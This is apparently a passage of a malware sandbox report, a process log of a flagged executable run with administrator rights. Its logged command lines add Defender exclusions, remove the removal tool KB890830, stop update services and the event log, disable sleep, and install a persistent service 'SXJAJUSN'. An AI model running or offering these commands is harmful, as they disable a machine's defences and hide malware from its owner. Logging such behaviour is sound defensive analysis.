                                                                                                                                                                                                    Imagebase:0x7ff605e50000
                                                                                                                                                                                                    File size:5'614'592 bytes
                                                                                                                                                                                                    MD5 hash:DF65134B0B2B2CC03F07647794B274E5
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    Target ID:18
                                                                                                                                                                                                    Start time:13:59:40
                                                                                                                                                                                                    Start date:14/03/2024
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Imagebase: 0x7ff7582a0000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 19
Start time: 13:59:40
Start date: 14/03/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff6684c0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 21
Start time: 13:59:44
Start date: 14/03/2024
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
Imagebase: 0x7ff6fd780000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 22
Start time: 13:59:44
Start date: 14/03/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff6684c0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 23
Start time: 13:59:44
Start date: 14/03/2024
Path: C:\Windows\System32\sc.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\sc.exe stop UsoSvc
Imagebase: 0x7ff691e80000
File size: 72'192 bytes
MD5 hash: 3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 24
Start time: 13:59:44
Start date: 14/03/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff6684c0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 25
Start time: 13:59:44
Start date: 14/03/2024
Path: C:\Windows\System32\wusa.exe
Wow64 process (32bit): false
Commandline: wusa /uninstall /kb:890830 /quiet /norestart
Imagebase: 0x7ff7b1800000
File size: 345'088 bytes
MD5 hash: FBDA2B8987895780375FE0E6254F6198
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 26
Start time: 13:59:44
Start date: 14/03/2024
Path: C:\Windows\System32\sc.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\sc.exe stop WaaSMedicSvc
Imagebase: 0x7ff691e80000
File size: 72'192 bytes
MD5 hash: 3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 27
Start time: 13:59:44
Start date: 14/03/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff6684c0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 28
Start time: 13:59:44
Start date: 14/03/2024
Path: C:\Windows\System32\sc.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\sc.exe stop wuauserv
Imagebase: 0x7ff691e80000
File size: 72'192 bytes
MD5 hash: 3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 29
Start time: 13:59:44
Start date: 14/03/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff6684c0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 30
Start time: 13:59:44
Start date: 14/03/2024
Path: C:\Windows\System32\sc.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\sc.exe stop bits
Imagebase: 0x7ff691e80000
File size: 72'192 bytes
MD5 hash: 3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 31
Start time: 13:59:44
Start date: 14/03/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                    Imagebase:0x7ff6684c0000
                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    Target ID:32
                                                                                                                                                                                                    Start time:13:59:45
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\sc.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\sc.exe stop dosvc
                                                                                                                                                                                                    Imagebase:0x7ff691e80000
                                                                                                                                                                                                    File size:72'192 bytes
                                                                                                                                                                                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    Target ID:33
                                                                                                                                                                                                    Start time:13:59:45
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                    Imagebase:0x7ff6684c0000
                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    Target ID:34
                                                                                                                                                                                                    Start time:13:59:45
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\powercfg.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                                                                                                                                                    Imagebase:0x7ff67eca0000
                                                                                                                                                                                                    File size:96'256 bytes
                                                                                                                                                                                                    MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    Target ID:35
                                                                                                                                                                                                    Start time:13:59:45
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\powercfg.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                                                                                                                                                    Imagebase:0x7ff67eca0000
                                                                                                                                                                                                    File size:96'256 bytes
                                                                                                                                                                                                    MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    Target ID:36
                                                                                                                                                                                                    Start time:13:59:45
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                    Imagebase:0x7ff6684c0000
                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    Target ID:37
                                                                                                                                                                                                    Start time:13:59:45
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\powercfg.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                                                                                                                                                    Imagebase:0x7ff67eca0000
                                                                                                                                                                                                    File size:96'256 bytes
                                                                                                                                                                                                    MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    Target ID:38
                                                                                                                                                                                                    Start time:13:59:45
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                    Imagebase:0x7ff6684c0000
                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    Target ID:39
                                                                                                                                                                                                    Start time:13:59:45
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\powercfg.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                                                                                                                                                    Imagebase:0x7ff67eca0000
                                                                                                                                                                                                    File size:96'256 bytes
                                                                                                                                                                                                    MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    Target ID:40
                                                                                                                                                                                                    Start time:13:59:45
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                    Imagebase:0x7ff6684c0000
                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:true

Target ID: 41
Start time: 13:59:45
Start date: 14/03/2024
Path: C:\Windows\System32\dialer.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\dialer.exe
Imagebase: 0x7ff643940000
File size: 39'936 bytes
MD5 hash: B2626BDCF079C6516FC016AC5646DF93
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 42
Start time: 13:59:45
Start date: 14/03/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff6684c0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 43
Start time: 13:59:45
Start date: 14/03/2024
Path: C:\Windows\System32\sc.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\sc.exe delete "SXJAJUSN"
Imagebase: 0x7ff691e80000
File size: 72'192 bytes
MD5 hash: 3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 44
Start time: 13:59:45
Start date: 14/03/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff6684c0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 45
Start time: 13:59:45
Start date: 14/03/2024
Path: C:\Windows\System32\sc.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\sc.exe create "SXJAJUSN" binpath= "C:\ProgramData\guqotihtvufx\jnxsifnrdetl.exe" start= "auto"
Imagebase: 0x7ff691e80000
File size: 72'192 bytes
MD5 hash: 3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 46
Start time: 13:59:45
Start date: 14/03/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff6684c0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 47
Start time: 13:59:45
Start date: 14/03/2024
Path: C:\Windows\System32\winlogon.exe
Wow64 process (32bit): false
Commandline: winlogon.exe
Imagebase: 0x7ff618820000
File size: 906'240 bytes
MD5 hash: F8B41A1B3E569E7E6F990567F21DCE97
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: false

Target ID: 48
Start time: 13:59:46
Start date: 14/03/2024
Path: C:\Windows\System32\sc.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\sc.exe stop eventlog
Imagebase: 0x7ff691e80000
File size: 72'192 bytes
MD5 hash: 3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 49
Start time: 13:59:46
Start date: 14/03/2024
Path: C:\Windows\System32\lsass.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\lsass.exe
Imagebase: 0x7ff786790000
File size: 59'456 bytes
MD5 hash: A1CC00332BBF370654EE3DC8CDC8C95A
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: false

Target ID: 50
Start time: 13:59:46
Start date: 14/03/2024
Path: C:\Windows\System32\sc.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\sc.exe start "SXJAJUSN"
Imagebase: 0x7ff691e80000
File size: 72'192 bytes
MD5 hash: 3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 51
Start time: 13:59:46
Start date: 14/03/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff6684c0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 52
Start time: 13:59:46
Start date: 14/03/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff6684c0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 53
Start time: 13:59:46
Start date: 14/03/2024
Path: C:\ProgramData\guqotihtvufx\jnxsifnrdetl.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\ProgramData\guqotihtvufx\jnxsifnrdetl.exe
                                                                                                                                                                                                    Imagebase:0x7ff7fd500000
                                                                                                                                                                                                    File size:5'614'592 bytes
                                                                                                                                                                                                    MD5 hash:DF65134B0B2B2CC03F07647794B274E5
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                                                    • Detection: 100%, Avira
                                                                                                                                                                                                    • Detection: 96%, ReversingLabs
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    Target ID:54
                                                                                                                                                                                                    Start time:13:59:46
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                                                                                                                                                    Imagebase:0x7ff7582a0000
                                                                                                                                                                                                    File size:452'608 bytes
                                                                                                                                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    Target ID:55
                                                                                                                                                                                                    Start time:13:59:46
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                    Imagebase:0x7ff6684c0000
                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    Target ID:56
                                                                                                                                                                                                    Start time:13:59:46
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
                                                                                                                                                                                                    Imagebase:0x7ff62c440000
                                                                                                                                                                                                    File size:55'320 bytes
                                                                                                                                                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                    Target ID:57
                                                                                                                                                                                                    Start time:13:59:47
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\dwm.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:dwm.exe
                                                                                                                                                                                                    Imagebase:0x7ff63a830000
                                                                                                                                                                                                    File size:94'720 bytes
                                                                                                                                                                                                    MD5 hash:5C27608411832C5B39BA04E33D53536C
                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                    Target ID:58
                                                                                                                                                                                                    Start time:13:59:51
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                                                                                                    Imagebase:0x7ff6fd780000
                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    Target ID:59
                                                                                                                                                                                                    Start time:13:59:51
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\sc.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\sc.exe stop UsoSvc
                                                                                                                                                                                                    Imagebase:0x7ff691e80000
                                                                                                                                                                                                    File size:72'192 bytes
                                                                                                                                                                                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    Target ID:60
                                                                                                                                                                                                    Start time:13:59:51
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                    Imagebase:0x7ff6684c0000
                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    Target ID:61
                                                                                                                                                                                                    Start time:13:59:51
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                    Imagebase:0x7ff6684c0000
                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    Target ID:62
                                                                                                                                                                                                    Start time:13:59:51
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\wusa.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                                                                                                    Imagebase:0x7ff7b1800000
                                                                                                                                                                                                    File size:345'088 bytes
MD5 hash:FBDA2B8987895780375FE0E6254F6198
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:63
Start time:13:59:51
Start date:14/03/2024
Path:C:\Windows\System32\sc.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\sc.exe stop WaaSMedicSvc
Imagebase:0x7ff691e80000
File size:72'192 bytes
MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:64
Start time:13:59:51
Start date:14/03/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff6684c0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:65
Start time:13:59:51
Start date:14/03/2024
Path:C:\Windows\System32\sc.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\sc.exe stop wuauserv
Imagebase:0x7ff691e80000
File size:72'192 bytes
MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:66
Start time:13:59:51
Start date:14/03/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff6684c0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:67
Start time:13:59:51
Start date:14/03/2024
Path:C:\Windows\System32\sc.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\sc.exe stop bits
Imagebase:0x7ff691e80000
File size:72'192 bytes
MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:68
Start time:13:59:51
Start date:14/03/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff6684c0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:69
Start time:13:59:51
Start date:14/03/2024
Path:C:\Windows\System32\sc.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\sc.exe stop dosvc
Imagebase:0x7ff691e80000
File size:72'192 bytes
MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:70
Start time:13:59:51
Start date:14/03/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff6684c0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:71
Start time:13:59:51
Start date:14/03/2024
Path:C:\Windows\System32\powercfg.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Imagebase:0x7ff67eca0000
File size:96'256 bytes
MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:72
Start time:13:59:51
Start date:14/03/2024
Path:C:\Windows\System32\powercfg.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
Imagebase:0x7ff67eca0000
File size:96'256 bytes
MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:73
Start time:13:59:51
Start date:14/03/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff6684c0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:74
Start time:13:59:52
Start date:14/03/2024
Path:C:\Windows\System32\powercfg.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
Imagebase:0x7ff67eca0000
File size:96'256 bytes
MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    Target ID:75
                                                                                                                                                                                                    Start time:13:59:52
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
